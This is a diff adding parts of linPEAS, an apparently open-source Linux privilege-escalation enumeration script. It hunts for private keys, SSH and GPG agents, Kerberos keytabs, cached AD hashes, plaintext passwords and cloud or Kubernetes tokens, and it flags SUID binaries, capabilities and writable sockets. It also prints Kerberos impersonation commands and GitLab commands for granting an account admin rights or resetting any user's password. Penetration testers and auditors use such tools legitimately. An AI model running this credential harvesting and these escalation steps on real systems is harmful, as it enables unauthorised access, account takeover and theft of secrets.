+  if [ "$privatekeyfilesetc" ]; then printf "$privatekeyfilesetc\n" | sed -${E} "s,.*,${SED_RED},"; fi
+  if [ "$privatekeyfileshome" ]; then printf "$privatekeyfileshome\n" | sed -${E} "s,.*,${SED_RED},"; fi
+  if [ "$privatekeyfilesroot" ]; then printf "$privatekeyfilesroot\n" | sed -${E} "s,.*,${SED_RED},"; fi
+  if [ "$privatekeyfilesmnt" ]; then printf "$privatekeyfilesmnt\n" | sed -${E} "s,.*,${SED_RED},"; fi
+  echo ""
+fi
+if [ "$certsb4_grep" ] || [ "$PSTORAGE_CERTSBIN" ]; then
+  print_3title "Some certificates were found (out limited):"
+  printf "$certsb4_grep\n" | head -n 20
+  printf "$$PSTORAGE_CERTSBIN\n" | head -n 20
+    echo ""
+fi
+if [ "$PSTORAGE_CERTSCLIENT" ]; then
+  print_3title "Some client certificates were found:"
+  printf "$PSTORAGE_CERTSCLIENT\n"
+  echo ""
+fi
+if [ "$PSTORAGE_SSH_AGENTS" ]; then
+  print_3title "Some SSH Agent files were found:"
+  printf "$PSTORAGE_SSH_AGENTS\n"
+  echo ""
+fi
+if ssh-add -l 2>/dev/null | grep -qv 'no identities'; then
+  print_3title "Listing SSH Agents"
+  ssh-add -l
+  echo ""
+fi
+if gpg-connect-agent "keyinfo --list" /bye | grep "D - - 1"; then
+  print_3title "Listing gpg keys cached in gpg-agent"
+  gpg-connect-agent "keyinfo --list" /bye
+  echo ""
+fi
+if [ "$writable_agents" ]; then
+  print_3title "Writable ssh and gpg agents"
+  printf "%s\n" "$writable_agents"
+fi
+if [ "$PSTORAGE_SSH_CONFIG" ]; then
+  print_3title "Some home ssh config file was found"
+  printf "%s\n" "$PSTORAGE_SSH_CONFIG" | while read f; do ls "$f" | sed -${E} "s,$f,${SED_RED},"; cat "$f" 2>/dev/null | grep -Iv "^$" | grep -v "^#" | sed -${E} "s,User|ProxyCommand,${SED_RED},"; done
+  echo ""
+fi
+if [ "$hostsdenied" ]; then
+  print_3title "/etc/hosts.denied file found, read the rules:"
+  printf "$hostsdenied\n"
+  cat "/etc/hosts.denied" 2>/dev/null | grep -v "#" | grep -Iv "^$" | sed -${E} "s,.*,${SED_GREEN},"
+  echo ""
+fi
+if [ "$hostsallow" ]; then
+  print_3title "/etc/hosts.allow file found, trying to read the rules:"
+  printf "$hostsallow\n"
+  cat "/etc/hosts.allow" 2>/dev/null | grep -v "#" | grep -Iv "^$" | sed -${E} "s,.*,${SED_RED},"
+  echo ""
+fi
+if [ "$sshconfig" ]; then
+  echo ""
+  echo "Searching inside /etc/ssh/ssh_config for interesting info"
+  grep -v "^#" /etc/ssh/ssh_config 2>/dev/null | grep -Ev "\W+\#|^#" 2>/dev/null | grep -Iv "^$" | sed -${E} "s,Host|ForwardAgent|User|ProxyCommand,${SED_RED},"
+fi
+echo ""
+
+peass{PAM Auth}
+
+#-- SI) Passwords inside pam.d
+pamdpass=$(grep -Ri "passwd" /etc/pam.d/ 2>/dev/null | grep -v ":#")
+if [ "$pamdpass" ] || [ "$DEBUG" ]; then
+  print_2title "Passwords inside pam.d"
+  grep -Ri "passwd" /etc/pam.d/ 2>/dev/null | grep -v ":#" | sed "s,passwd,${SED_RED},"
+  echo ""
+fi
+
+peass{NFS Exports}
+
+#-- SI) Kerberos
+kadmin_exists="$(command -v kadmin)"
+klist_exists="$(command -v klist)"
+if [ "$kadmin_exists" ] || [ "$klist_exists" ] || [ "$PSTORAGE_KERBEROS" ] || [ "$DEBUG" ]; then
+  print_2title "Searching kerberos conf files and tickets"
+  print_info "http://book.hacktricks.xyz/linux-unix/privilege-escalation/linux-active-directory"
+
+  if [ "$kadmin_exists" ]; then echo "kadmin was found on $kadmin_exists" | sed "s,$kadmin_exists,${SED_RED},"; fi
+  if [ "$klist_exists" ] && [ -x "$klist_exists" ]; then echo "klist execution"; klist; fi
+  ptrace_scope="$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null)"
+  if [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ]; then echo "ptrace protection is disabled (0), you might find tickets inside processes memory" | sed "s,is disabled,${SED_RED},g";
+  else echo "ptrace protection is enabled ($ptrace_scope), you need to disable it to search for tickets inside processes memory" | sed "s,is enabled,${SED_GREEN},g";
+  fi
+
+  printf "%s\n" "$PSTORAGE_KERBEROS" | while read f; do
+    if [ -r "$f" ]; then
+      if echo "$f" | grep -q .k5login; then
+        echo ".k5login file (users with access to the user who has this file in his home)"
+        cat "$f" 2>/dev/null | sed -${E} "s,.*,${SED_RED},g"
+      elif echo "$f" | grep -q keytab; then
+        echo ""
+        echo "keytab file found, you may be able to impersonate some kerberos principals and add users or modify passwords"
+        klist -k "$f" 2>/dev/null | sed -${E} "s,.*,${SED_RED},g"
+        printf "$(klist -k $f 2>/dev/null)\n" | awk '{print $2}' | while read l; do
+          if [ "$l" ] && echo "$l" | grep -q "@"; then
+            printf "$ITALIC  --- Impersonation command: ${NC}kadmin -k -t /etc/krb5.keytab -p \"$l\"\n" | sed -${E} "s,$l,${SED_RED},g"
+            #kadmin -k -t /etc/krb5.keytab -p "$l" -q getprivs 2>/dev/null #This should show the permissions of each impersoanted user, the thing is that in a test it showed that every user had the same permissions (even if they didn't). So this test isn't valid
+            #We could also try to create a new user or modify a password, but I'm not user if linpeas should do that
+          fi
+        done
+      elif echo "$f" | grep -q krb5.conf; then
+        ls -l "$f"
+        cat "$f" 2>/dev/null | sed -${E} "s,default_ccache_name,${SED_RED},";
+      elif echo "$f" | grep -q kadm5.acl; then
+        ls -l "$f" 
+        cat "$f" 2>/dev/null
+      elif echo "$f" | grep -q sssd.conf; then
+        ls -l "$f"
+        cat "$f" 2>/dev/null | sed -${E} "s,cache_credentials ?= ?[tT][rR][uU][eE],${SED_RED},";
+      elif echo "$f" | grep -q secrets.ldb; then
+        echo "You could use SSSDKCMExtractor to extract the tickets stored here" | sed -${E} "s,SSSDKCMExtractor,${SED_RED},";
+        ls -l "$f"
+      elif echo "$f" | grep -q .secrets.mkey; then
+        echo "This is the secrets file to use with SSSDKCMExtractor" | sed -${E} "s,SSSDKCMExtractor,${SED_RED},";
+        ls -l "$f"
+      fi
+    fi
+  done
+  ls -l "/tmp/krb5cc*" "/var/lib/sss/db/ccache_*" "/etc/opt/quest/vas/host.keytab" 2>/dev/null || echo_not_found "tickets kerberos"
+  klist 2>/dev/null || echo_not_found "klist"
+  echo ""
+
+fi
+
+peass{Knockd}
+
+peass{Kibana}
+
+peass{Elasticsearch}
+
+##-- SI) Logstash
+if [ "$PSTORAGE_LOGSTASH" ] || [ "$DEBUG" ]; then
+  print_2title "Searching logstash files"
+  printf "$PSTORAGE_LOGSTASH"
+  printf "%s\n" "$PSTORAGE_LOGSTASH" | while read d; do
+    if [ -r "$d/startup.options" ]; then
+      echo "Logstash is running as user:"
+      cat "$d/startup.options" 2>/dev/null | grep "LS_USER\|LS_GROUP" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed -${E} "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,root,${SED_RED},"
+    fi
+    cat "$d/conf.d/out*" | grep "exec\s*{\|command\s*=>" | sed -${E} "s,exec\W*\{|command\W*=>,${SED_RED},"
+    cat "$d/conf.d/filt*" | grep "path\s*=>\|code\s*=>\|ruby\s*{" | sed -${E} "s,path\W*=>|code\W*=>|ruby\W*\{,${SED_RED},"
+  done
+fi
+echo ""
+
+#-- SI) Vault-ssh
+if [ "$PSTORAGE_VAULT_SSH_HELPER" ] || [ "$DEBUG" ]; then
+  print_2title "Searching Vault-ssh files"
+  printf "$PSTORAGE_VAULT_SSH_HELPER\n"
+  printf "%s\n" "$PSTORAGE_VAULT_SSH_HELPER" | while read f; do cat "$f" 2>/dev/null; vault-ssh-helper -verify-only -config "$f" 2>/dev/null; done
+  echo ""
+  vault secrets list 2>/dev/null
+  printf "%s\n" "$PSTORAGE_VAULT_SSH_TOKEN" | sed -${E} "s,.*,${SED_RED}," 2>/dev/null
+fi
+echo ""
+
+#-- SI) Cached AD Hashes
+adhashes=$(ls "/var/lib/samba/private/secrets.tdb" "/var/lib/samba/passdb.tdb" "/var/opt/quest/vas/authcache/vas_auth.vdb" "/var/lib/sss/db/cache_*" 2>/dev/null)
+if [ "$adhashes" ] || [ "$DEBUG" ]; then
+  print_2title "Searching AD cached hashes"
+  ls -l "/var/lib/samba/private/secrets.tdb" "/var/lib/samba/passdb.tdb" "/var/opt/quest/vas/authcache/vas_auth.vdb" "/var/lib/sss/db/cache_*" 2>/dev/null
+  echo ""
+fi
+
+#-- SI) Screen sessions
+if [ "$screensess" ] || [ "$screensess2" ] || [ "$DEBUG" ]; then
+  print_2title "Searching screen sessions"
+  print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions"
+  screensess=$(screen -ls 2>/dev/null)
+  screensess2=$(find /run/screen -type d -path "/run/screen/S-*" 2>/dev/null)
+  
+  screen -v
+  printf "$screensess\n$screensess2" | sed -${E} "s,.*,${SED_RED}," | sed -${E} "s,No Sockets found.*,${C}[32m&${C}[0m,"
+  
+  find /run/screen -type s -path "/run/screen/S-*" -not -user $USER '(' '(' -perm -o=w ')' -or  '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null | while read f; do
+    echo "Other user screen socket is writable: $f" | sed "s,$f,${SED_RED_YELLOW},"
+  done
+  echo ""
+fi
+
+#-- SI) Tmux sessions
+tmuxdefsess=$(tmux ls 2>/dev/null)
+tmuxnondefsess=$(ps auxwww | grep "tmux " | grep -v grep)
+tmuxsess2=$(find /tmp -type d -path "/tmp/tmux-*" 2>/dev/null)
+if [ "$tmuxdefsess" ] || [ "$tmuxnondefsess" ] || [ "$tmuxsess2" ] || [ "$DEBUG" ]; then
+  print_2title "Searching tmux sessions"$N
+  print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions"
+  tmux -V
+  printf "$tmuxdefsess\n$tmuxnondefsess\n$tmuxsess2" | sed -${E} "s,.*,${SED_RED}," | sed -${E} "s,no server running on.*,${C}[32m&${C}[0m,"
+
+  find /tmp -type s -path "/tmp/tmux*" -not -user $USER '(' '(' -perm -o=w ')' -or  '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null | while read f; do
+    echo "Other user tmux socket is writable: $f" | sed "s,$f,${SED_RED_YELLOW},"
+  done
+  echo ""
+fi
+
+peass{CouchDB}
+
+peass{Redis}
+
+#-- SI) Dovecot
+# Needs testing
+dovecotpass=$(grep -r "PLAIN" /etc/dovecot 2>/dev/null)
+if [ "$dovecotpass" ] || [ "$DEBUG" ]; then
+  print_2title "Searching dovecot files"
+  if [ -z "$dovecotpass" ]; then
+    echo_not_found "dovecot credentials"
+  else
+    printf "%s\n" "$dovecotpass" | while read d; do
+      df=$(echo $d |cut -d ':' -f1)
+      dp=$(echo $d |cut -d ':' -f2-)
+      echo "Found possible PLAIN text creds in $df"
+      echo "$dp" | sed -${E} "s,.*,${SED_RED}," 2>/dev/null
+    done
+  fi
+  echo ""
+fi
+
+peass{Mosquitto}
+
+peass{Neo4j}
+
+peass{Cloud Credentials}
+
+peass{Cloud Init}
+
+peass{CloudFlare}
+
+peass{Erlang}
+
+peass{GMV Auth}
+
+peass{IPSec}
+
+peass{IRSSI}
+
+peass{Keyring}
+
+peass{Filezilla}
+
+peass{Backup Manager}
+
+##-- SI) passwd files (splunk)
+SPLUNK_BIN="$(command -v splunk 2>/dev/null)"
+if [ "$PSTORAGE_SPLUNK" ] || [ "$SPLUNK_BIN" ] || [ "$DEBUG" ]; then
+  print_2title "Searching uncommon passwd files (splunk)"
+  if [ "$SPLUNK_BIN" ]; then echo "splunk binary was found installed on $SPLUNK_BIN" | sed "s,.*,${SED_RED},"; fi
+  printf "%s\n" "$PSTORAGE_SPLUNK" | sort | uniq | while read f; do
+    if [ -f "$f" ] && ! [ -x "$f" ]; then
+      echo "passwd file: $f" | sed "s,$f,${SED_RED},"
+      cat "$f" 2>/dev/null | grep "'pass'|'password'|'user'|'database'|'host'|\$" | sed -${E} "s,password|pass|user|database|host|\$,${SED_RED},"
+    fi
+  done
+  echo ""
+fi
+
+if [ "$PSTORAGE_KCPASSWORD" ] || [ "$DEBUG" ]; then
+  print_2title "Analyzing kcpassword files"
+  print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#kcpassword"
+  printf "%s\n" "$PSTORAGE_KCPASSWORD" | while read f; do
+    echo "$f" | sed -${E} "s,.*,${SED_RED},"
+    base64 "$f" 2>/dev/null | sed -${E} "s,.*,${SED_RED},"
+  done
+  echo ""
+fi
+
+##-- SI) Gitlab
+if [ "$(command -v gitlab-rails)" ] || [ "$(command -v gitlab-backup)" ] || [ "$PSTORAGE_GITLAB" ] || [ "$DEBUG" ]; then
+  print_2title "Searching GitLab related files"
+  #Check gitlab-rails
+  if [ "$(command -v gitlab-rails)" ]; then
+    echo "gitlab-rails was found. Trying to dump users..."
+    gitlab-rails runner 'User.where.not(username: "peasssssssss").each { |u| pp u.attributes }' | sed -${E} "s,email|password,${SED_RED},"
+    echo "If you have enough privileges, you can make an account under your control administrator by running: gitlab-rails runner 'user = User.find_by(email: \"youruser@example.com\"); user.admin = TRUE; user.save!'"
+    echo "Alternatively, you could change the password of any user by running: gitlab-rails runner 'user = User.find_by(email: \"admin@example.com\"); user.password = \"pass_peass_pass\"; user.password_confirmation = \"pass_peass_pass\"; user.save!'"
+    echo ""
+  fi
+  if [ "$(command -v gitlab-backup)" ]; then
+    echo "If you have enough privileges, you can create a backup of all the repositories inside gitlab using 'gitlab-backup create'"
+    echo "Then you can get the plain-text with something like 'git clone \@hashed/19/23/14348274[...]38749234.bundle'"
+    echo ""
+  fi
+  #Check gitlab files
+  printf "%s\n" "$PSTORAGE_GITLAB" | sort | uniq | while read f; do
+    if echo $f | grep -q secrets.yml; then
+      echo "Found $f" | sed "s,$f,${SED_RED},"
+      cat "$f" 2>/dev/null | grep -Iv "^$" | grep -v "^#"
+    elif echo $f | grep -q gitlab.yml; then
+      echo "Found $f" | sed "s,$f,${SED_RED},"
+      cat "$f" | grep -A 4 "repositories:"
+    elif echo $f | grep -q gitlab.rb; then
+      echo "Found $f" | sed "s,$f,${SED_RED},"
+      cat "$f" | grep -Iv "^$" | grep -v "^#" | sed -${E} "s,email|user|password,${SED_RED},"
+    fi
+    echo ""
+  done
+  echo ""
+fi
+
+peass{Github}
+
+peass{Svn}
+
+peass{PGP-GPG}
+
+peass{Cache Vi}
+
+peass{Wget}
+
+##-- SI) containerd installed
+containerd=$(command -v ctr)
+if [ "$containerd" ] || [ "$DEBUG" ]; then
+  print_2title "Checking if containerd(ctr) is available"
+  print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/containerd-ctr-privilege-escalation"
+  if [ "$containerd" ]; then
+    echo "ctr was found in $containerd, you may be able to escalate privileges with it" | sed -${E} "s,.*,${SED_RED},"
+    ctr image list
+  fi
+  echo ""
+fi
+
+##-- SI) runc installed
+runc=$(command -v runc)
+if [ "$runc" ] || [ "$DEBUG" ]; then
+  print_2title "Checking if runc is available"
+  print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/runc-privilege-escalation"
+  if [ "$runc" ]; then
+    echo "runc was found in $runc, you may be able to escalate privileges with it" | sed -${E} "s,.*,${SED_RED},"
+  fi
+  echo ""
+fi
+
+#-- SI) Docker
+if [ "$PSTORAGE_DOCKER" ] || [ "$DEBUG" ]; then
+  print_2title "Searching docker files (limit 70)"
+  print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket"
+  printf "%s\n" "$PSTORAGE_DOCKER" | head -n 70 | while read f; do
+    ls -l "$f" 2>/dev/null
+    if ! [ "$IAMROOT" ] && [ -S "$f" ] && [ -w "$f" ]; then
+      echo "Docker socket file ($f) is writable" | sed -${E} "s,.*,${SED_RED_YELLOW},"
+    fi
+  done
+  echo ""
+fi
+
+if [ -d "$HOME/.kube" ] || [ -d "/etc/kubernetes" ] || [ -d "/var/lib/localkube" ] || [ "`(env | set) | grep -Ei 'kubernetes|kube' | grep -v "PSTORAGE_KUBELET|USEFUL_SOFTWARE"`" ] || [ "$DEBUG" ]; then
+  print_2title "Kubernetes information" | sed -${E} "s,config,${SED_RED},"
+  ls -l "$HOME/.kube" 2>/dev/null
+  grep -ERH "client-secret:|id-token:|refresh-token:" "$HOME/.kube" 2>/dev/null | sed -${E} "s,client-secret:.*|id-token:.*|refresh-token:.*,${SED_RED},"
+  (env || set) | grep -Ei "kubernetes|kube" | grep -v "PSTORAGE_KUBELET|USEFUL_SOFTWARE" | sed -${E} "s,kubernetes|kube,${SED_RED},"
+  ls -Rl /etc/kubernetes /var/lib/localkube 2>/dev/null
+fi
+
+peass{Kubelet}
+
+peass{Firefox}
+
+peass{Chrome}
+
+peass{Autologin}
+
+#-- SI) S/Key athentication
+if (grep auth= /etc/login.conf 2>/dev/null | grep -v "^#" | grep -q skey) || [ "$DEBUG" ] ; then
+  print_2title "S/Key authentication"
+  printf "System supports$RED S/Key$NC authentication\n"
+  if ! [ -d /etc/skey/ ]; then
+    echo "${GREEN}S/Key authentication enabled, but has not been initialized"
+  elif ! [ "$IAMROOT" ] && [ -w /etc/skey/ ]; then
+    echo "${RED}/etc/skey/ is writable by you"
+    ls -ld /etc/skey/
+  else
+    ls -ld /etc/skey/ 2>/dev/null
+  fi
+fi
+echo ""
+
+#-- SI) YubiKey athentication
+if (grep "auth=" /etc/login.conf 2>/dev/null | grep -v "^#" | grep -q yubikey) || [ "$DEBUG" ]; then
+  print_2title "YubiKey authentication"
+  printf "System supports$RED YubiKey$NC authentication\n"
+  if ! [ "$IAMROOT" ] && [ -w /var/db/yubikey/ ]; then
+    echo "${RED}/var/db/yubikey/ is writable by you"
+    ls -ld /var/db/yubikey/
+  else
+    ls -ld /var/db/yubikey/ 2>/dev/null
+  fi
+  echo ""
+fi
+
+peass{SNMP}
+
+peass{Pypirc}
+
+peass{Postfix}
+
+peass{Ldaprc}
+
+peass{Env}
+
+peass{Msmtprc}
+
+peass{Keepass}
+
+peass{FTP}
+
+peass{EXTRA_SECTIONS}
+
+peass{Interesting logs}
+
+peass{Windows Files}
+
+peass{Other Interesting Files}

linPEAS/builder/linpeas_parts/7_interesting_files.sh

@@ -0,0 +1,632 @@
+###########################################
+#----------) Interesting files (----------#
+###########################################
+
+check_critial_root_path(){
+  folder_path="$1"
+  if [ -w "$folder_path" ]; then echo "You have write privileges over $folder_path" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi
+  if [ "$(find $folder_path -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or  '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find $folder_path -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or  '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi
+  if [ "$(find $folder_path -type f -not -user root 2>/dev/null)" ]; then echo "The following files aren't owned by root: $(find $folder_path -type f -not -user root 2>/dev/null)"; fi
+}
+
+
+
+
+
+
+
+
+##-- IF) SUID
+print_2title "SUID - Check easy privesc, exploits and write perms"
+print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid"
+if ! [ "$STRINGS" ]; then
+  echo_not_found "strings"
+fi
+if ! [ "$STRACE" ]; then
+  echo_not_found "strace"
+fi
+suids_files=$(find / -perm -4000 -type f ! -path "/dev/*" 2>/dev/null)
+for s in $suids_files; do
+  s=$(ls -lahtr "$s")
+  #If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder
+  if echo "$s" | grep -qE "^total"; then break; fi
+
+  sname="$(echo $s | awk '{print $9}')"
+  if [ "$sname" = "."  ] || [ "$sname" = ".."  ]; then
+    true #Don't do nothing
+  elif ! [ "$IAMROOT" ] && [ -O "$sname" ]; then
+    echo "You own the SUID file: $sname" | sed -${E} "s,.*,${SED_RED},"
+  elif ! [ "$IAMROOT" ] && [ -w "$sname" ]; then #If write permision, win found (no check exploits)
+    echo "You can write SUID file: $sname" | sed -${E} "s,.*,${SED_RED_YELLOW},"
+  else
+    c="a"
+    for b in $sidB; do
+      if echo $s | grep -q $(echo $b | cut -d % -f 1); then
+        echo "$s" | sed -${E} "s,$(echo $b | cut -d % -f 1),${C}[1;31m&  --->  $(echo $b | cut -d % -f 2)${C}[0m,"
+        c=""
+        break;
+      fi
+    done;
+    if [ "$c" ]; then
+      if echo "$s" | grep -qE "$sidG1" || echo "$s" | grep -qE "$sidG2" || echo "$s" | grep -qE "$sidG3" || echo "$s" | grep -qE "$sidG4" || echo "$s" | grep -qE "$sidVB" || echo "$s" | grep -qE "$sidVB2"; then
+        echo "$s" | sed -${E} "s,$sidG1,${SED_GREEN}," | sed -${E} "s,$sidG2,${SED_GREEN}," | sed -${E} "s,$sidG3,${SED_GREEN}," | sed -${E} "s,$sidG4,${SED_GREEN}," | sed -${E} "s,$sidVB,${SED_RED_YELLOW}," | sed -${E} "s,$sidVB2,${SED_RED_YELLOW},"
+      else
+        echo "$s (Unknown SUID binary)" | sed -${E} "s,/.*,${SED_RED},"
+        printf $ITALIC
+        if ! [ "$FAST" ] && [ "$STRINGS" ]; then
+          $STRINGS "$sname" 2>/dev/null | sort | uniq | while read sline; do
+            sline_first="$(echo "$sline" | cut -d ' ' -f1)"
+            if echo "$sline_first" | grep -qEv "$cfuncs"; then
+              if echo "$sline_first" | grep -q "/" && [ -f "$sline_first" ]; then #If a path
+                if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then #And modifiable
+                  printf "$ITALIC  --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can modify it (strings line: $sline) (https://tinyurl.com/suidpath)\n"
+                fi
+              else #If not a path
+                if [ ${#sline_first} -gt 2 ] && command -v "$sline_first" 2>/dev/null | grep -q '/' && echo "$sline_first" | grep -Eqv "\.\."; then #Check if existing binary
+                  printf "$ITALIC  --- It looks like $RED$sname$NC$ITALIC is executing $RED$sline_first$NC$ITALIC and you can impersonate it (strings line: $sline) (https://tinyurl.com/suidpath)\n"
+                fi
+              fi
+            fi
+          done
+          if ! [ "$FAST" ] && [ "$TIMEOUT" ] && [ "$STRACE" ] && ! [ "$NOTEXPORT" ] && [ -x "$sname" ]; then
+            printf $ITALIC
+            echo "----------------------------------------------------------------------------------------"
+            echo "  --- Trying to execute $sname with strace in order to look for hijackable libraries..."
+            OLD_LD_LIBRARY_PATH=$LD_LIBRARY_PATH
+            export LD_LIBRARY_PATH=""
+            timeout 2 "$STRACE" "$sname" 2>&1 | grep -i -E "open|access|no such file" | sed -${E} "s,open|access|No such file,${SED_RED}$ITALIC,g"
+            printf $NC
+            export LD_LIBRARY_PATH=$OLD_LD_LIBRARY_PATH
+            echo "----------------------------------------------------------------------------------------"
+            echo ""
+          fi
+        fi
+      fi
+    fi
+  fi
+done;
+echo ""
+
+
+##-- IF) SGID
+print_2title "SGID"
+print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid"
+sgids_files=$(find / -perm -2000 -type f ! -path "/dev/*" 2>/dev/null)
+for s in $sgids_files; do
+  s=$(ls -lahtr "$s")
+  #If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder
+  if echo "$s" | grep -qE "^total";then break; fi
+
+  sname="$(echo $s | awk '{print $9}')"
+  if [ "$sname" = "."  ] || [ "$sname" = ".."  ]; then
+    true #Don't do nothing
+  elif ! [ "$IAMROOT" ] && [ -O "$sname" ]; then
+    echo "You own the SGID file: $sname" | sed -${E} "s,.*,${SED_RED},"
+  elif ! [ "$IAMROOT" ] && [ -w "$sname" ]; then #If write permision, win found (no check exploits)
+    echo "You can write SGID file: $sname" | sed -${E} "s,.*,${SED_RED_YELLOW},"
+  else
+    c="a"
+    for b in $sidB; do
+      if echo "$s" | grep -q $(echo $b | cut -d % -f 1); then
+        echo "$s" | sed -${E} "s,$(echo $b | cut -d % -f 1),${C}[1;31m&  --->  $(echo $b | cut -d % -f 2)${C}[0m,"
+        c=""
+        break;
+      fi
+    done;
+    if [ "$c" ]; then
+      if echo "$s" | grep -qE "$sidG1" || echo "$s" | grep -qE "$sidG2" || echo "$s" | grep -qE "$sidG3" || echo "$s" | grep -qE "$sidG4" || echo "$s" | grep -qE "$sidVB" || echo "$s" | grep -qE "$sidVB2"; then
+        echo "$s" | sed -${E} "s,$sidG1,${SED_GREEN}," | sed -${E} "s,$sidG2,${SED_GREEN}," | sed -${E} "s,$sidG3,${SED_GREEN}," | sed -${E} "s,$sidG4,${SED_GREEN}," | sed -${E} "s,$sidVB,${SED_RED_YELLOW}," | sed -${E} "s,$sidVB2,${SED_RED_YELLOW},"
+      else
+        echo "$s (Unknown SGID binary)" | sed -${E} "s,/.*,${SED_RED},"
+        printf $ITALIC
+        if ! [ "$FAST" ] && [ "$STRINGS" ]; then
+          $STRINGS "$sname" | sort | uniq | while read sline; do
+            sline_first="$(echo $sline | cut -d ' ' -f1)"
+            if echo "$sline_first" | grep -qEv "$cfuncs"; then
+              if echo "$sline_first" | grep -q "/" && [ -f "$sline_first" ]; then #If a path
+                if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then #And modifiable
+                  printf "$ITALIC  --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can modify it (strings line: $sline)\n"
+                fi
+              else #If not a path
+                if [ ${#sline_first} -gt 2 ] && command -v "$sline_first" 2>/dev/null | grep -q '/'; then #Check if existing binary
+                  printf "$ITALIC  --- It looks like $RED$sname$NC$ITALIC is executing $RED$sline_first$NC$ITALIC and you can impersonate it (strings line: $sline)\n"
+                fi
+              fi
+            fi
+          done
+          if ! [ "$FAST" ] && [ "$TIMEOUT" ] && [ "$STRACE" ] && [ ! "$SUPERFAST" ]; then
+            printf "$ITALIC"
+            echo "  --- Trying to execute $sname with strace in order to look for hijackable libraries..."
+            timeout 2 "$STRACE" "$sname" 2>&1 | grep -i -E "open|access|no such file" | sed -${E} "s,open|access|No such file,${SED_RED}$ITALIC,g"
+            printf "$NC"
+            echo ""
+          fi
+        fi
+      fi
+    fi
+  fi
+done;
+echo ""
+
+##-- IF) Misconfigured ld.so
+print_2title "Checking misconfigurations of ld.so"
+print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#ld-so"
+printf $ITALIC"/etc/ld.so.conf\n"$NC;
+cat /etc/ld.so.conf 2>/dev/null | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g"
+cat /etc/ld.so.conf 2>/dev/null | while read l; do
+  if echo "$l" | grep -q include; then
+    ini_path=$(echo "$l" | cut -d " " -f 2)
+    fpath=$(dirname "$ini_path")
+    if [ "$(find $fpath -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or  '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find $fpath -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or  '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi
+    printf $ITALIC"$fpath\n"$NC | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g"
+    for f in $fpath/*; do
+      printf $ITALIC"  $f\n"$NC | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g"
+      cat "$f" | grep -v "^#" | sed -${E} "s,$ldsoconfdG,${SED_GREEN}," | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g"
+    done
+  fi
+done
+echo ""
+
+##-- IF) Capabilities
+print_2title "Capabilities"
+print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities"
+echo "Current capabilities:"
+(capsh --print 2>/dev/null | grep "Current:" | sed -${E} "s,$capsB,${SED_RED_YELLOW}," ) || echo_not_found "capsh"
+(cat "/proc/$$/status" | grep Cap | sed -${E} "s,.*0000000000000000|CapBnd:	0000003fffffffff,${SED_GREEN},") 2>/dev/null || echo_not_found "/proc/$$/status"
+echo ""
+echo "Shell capabilities:"
+(capsh --decode=0x"$(cat /proc/$PPID/status 2>/dev/null | grep CapEff | awk '{print $2}')" 2>/dev/null) || echo_not_found "capsh"
+(cat "/proc/$PPID/status" | grep Cap | sed -${E} "s,.*0000000000000000|CapBnd:	0000003fffffffff,${SED_GREEN},") 2>/dev/null || echo_not_found "/proc/$PPID/status"
+echo ""
+echo "Files with capabilities (limited to 50):"
+getcap -r / 2>/dev/null | head -n 50 | while read cb; do
+  capsVB_vuln=""
+  
+  for capVB in $capsVB; do
+    capname="$(echo $capVB | cut -d ':' -f 1)"
+    capbins="$(echo $capVB | cut -d ':' -f 2)"
+    if [ "$(echo $cb | grep -Ei $capname)" ] && [ "$(echo $cb | grep -E $capbins)" ]; then
+      echo "$cb" | sed -${E} "s,.*,${SED_RED_YELLOW},"
+      capsVB_vuln="1"
+      break
+    fi
+  done
+  
+  if ! [ "$capsVB_vuln" ]; then
+    echo "$cb" | sed -${E} "s,$capsB,${SED_RED},"
+  fi
+
+  if ! [ "$IAMROOT" ] && [ -w "$(echo $cb | cut -d" " -f1)" ]; then
+    echo "$cb is writable" | sed -${E} "s,.*,${SED_RED},"
+  fi
+done
+echo ""
+
+##-- IF) Users with capabilities
+if [ -f "/etc/security/capability.conf" ] || [ "$DEBUG" ]; then
+  print_2title "Users with capabilities"
+  print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities"
+  if [ -f "/etc/security/capability.conf" ]; then
